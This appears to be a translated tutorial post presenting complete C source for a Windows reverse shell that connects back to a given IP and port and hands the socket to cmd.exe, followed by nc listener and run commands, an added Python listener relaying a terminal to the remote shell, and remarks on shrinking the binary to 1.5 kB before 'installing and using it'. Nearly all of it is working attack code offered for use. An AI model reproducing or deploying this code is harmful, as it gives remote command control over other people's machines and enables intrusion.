Let's take a look at the following program:
#include <winsock2.h>   /* must come before windows.h */
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#pragma comment(lib, "ws2_32")

int main(int argc, char **argv)
{
    WSADATA wsaData;
    SOCKET hSocket;
    STARTUPINFOA si;
    PROCESS_INFORMATION pi;
    struct sockaddr_in adik_sin;

    if (argc != 3)              /* usage: sample.exe <ip> <port> */
        return -1;

    memset(&adik_sin, 0, sizeof(adik_sin));
    memset(&si, 0, sizeof(si));
    WSAStartup(MAKEWORD(2, 0), &wsaData);

    /* WSASocket with dwFlags = 0 creates a non-overlapped socket, which is
       what allows the handle to be used directly as cmd.exe's std handles;
       a socket from plain socket() is overlapped and would not work here. */
    hSocket = WSASocket(AF_INET, SOCK_STREAM, 0, NULL, 0, 0);
    if (hSocket == INVALID_SOCKET)
        return -1;

    adik_sin.sin_family = AF_INET;
    adik_sin.sin_port = htons((u_short)atoi(argv[2]));
    adik_sin.sin_addr.s_addr = inet_addr(argv[1]);

    /* connect back to the listener */
    if (0 != connect(hSocket, (struct sockaddr *)&adik_sin, sizeof(adik_sin)))
        return -1;

    /* hand the socket to cmd.exe as stdin/stdout/stderr; bInheritHandles is
       TRUE so the child process actually receives the handle */
    si.cb = sizeof(si);
    si.dwFlags = STARTF_USESTDHANDLES;
    si.hStdInput = si.hStdOutput = si.hStdError = (HANDLE)hSocket;
    CreateProcessA(NULL, "cmd.exe", NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi);
    return 0;
}
What it does is simple: it is a reverse connection (a reverse shell). The attacker side listens, the program connects back and hands the socket to cmd.exe as its standard input and output.
First, listen on a port with nc:
nc.exe -lp 5555
Then run the program from the command line:
sample.exe 127.0.0.1 5555
Finally, you get a cmd shell on the listening side.
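As an added example that is not part of the original post, here is a Python stand-in for the nc listener used above: it waits for the reverse shell to connect back on the given port, then relays the operator's terminal to the remote cmd.exe and the remote output back. The port number comes from the command line; the function names listen_once and relay are this example's own, and the binary file objects passed to relay are an assumption made so the relay can be exercised offline.

```python
"""Stand-in for `nc -lp PORT`: accept the reverse shell's connect-back and relay
the operator's terminal to the remote cmd.exe and its output back (added example)."""
import socket
import sys
import threading


def listen_once(port, bind_addr="0.0.0.0", timeout=None):
    """Bind PORT, accept exactly one connection and return (conn, peer_addr).

    The reverse shell does the connect(); this side only waits for it.
    """
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((bind_addr, port))
        srv.listen(1)
        srv.settimeout(timeout)
        conn, peer = srv.accept()
    return conn, peer


def relay(conn, local_in, local_out):
    """Pump bytes both ways until the remote side closes the connection.

    local_in / local_out are binary file objects (sys.stdin.buffer and
    sys.stdout.buffer in real use).  Returns the number of bytes received
    from the remote shell.
    """
    def pump_keyboard():
        # Everything typed locally goes verbatim to the remote cmd.exe's stdin.
        while True:
            line = local_in.readline()
            if not line:
                break
            try:
                conn.sendall(line)
            except OSError:
                break
        # No more local input: half-close so the remote cmd.exe sees EOF on stdin.
        try:
            conn.shutdown(socket.SHUT_WR)
        except OSError:
            pass

    threading.Thread(target=pump_keyboard, daemon=True).start()
    received = 0
    while True:
        data = conn.recv(4096)
        if not data:          # remote cmd.exe exited and the socket closed
            break
        received += len(data)
        local_out.write(data)
        local_out.flush()
    return received


if __name__ == "__main__":
    # usage: listener.py 5555   (then run sample.exe <this host> 5555)
    conn, peer = listen_once(int(sys.argv[1]))
    sys.stderr.write("connection from %s:%d\n" % peer)
    with conn:
        relay(conn, sys.stdin.buffer, sys.stdout.buffer)
```

Note that the remote end is cmd.exe reading raw bytes from a socket, so lines are sent exactly as typed, including the trailing newline that cmd.exe needs to execute the command.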
Build it as a Release build and the resulting executable is 23 KB. Build it once more with TinyFrame and the final size is 1.50 kB, which is quite attractive, right? Now let's talk about installing and using it.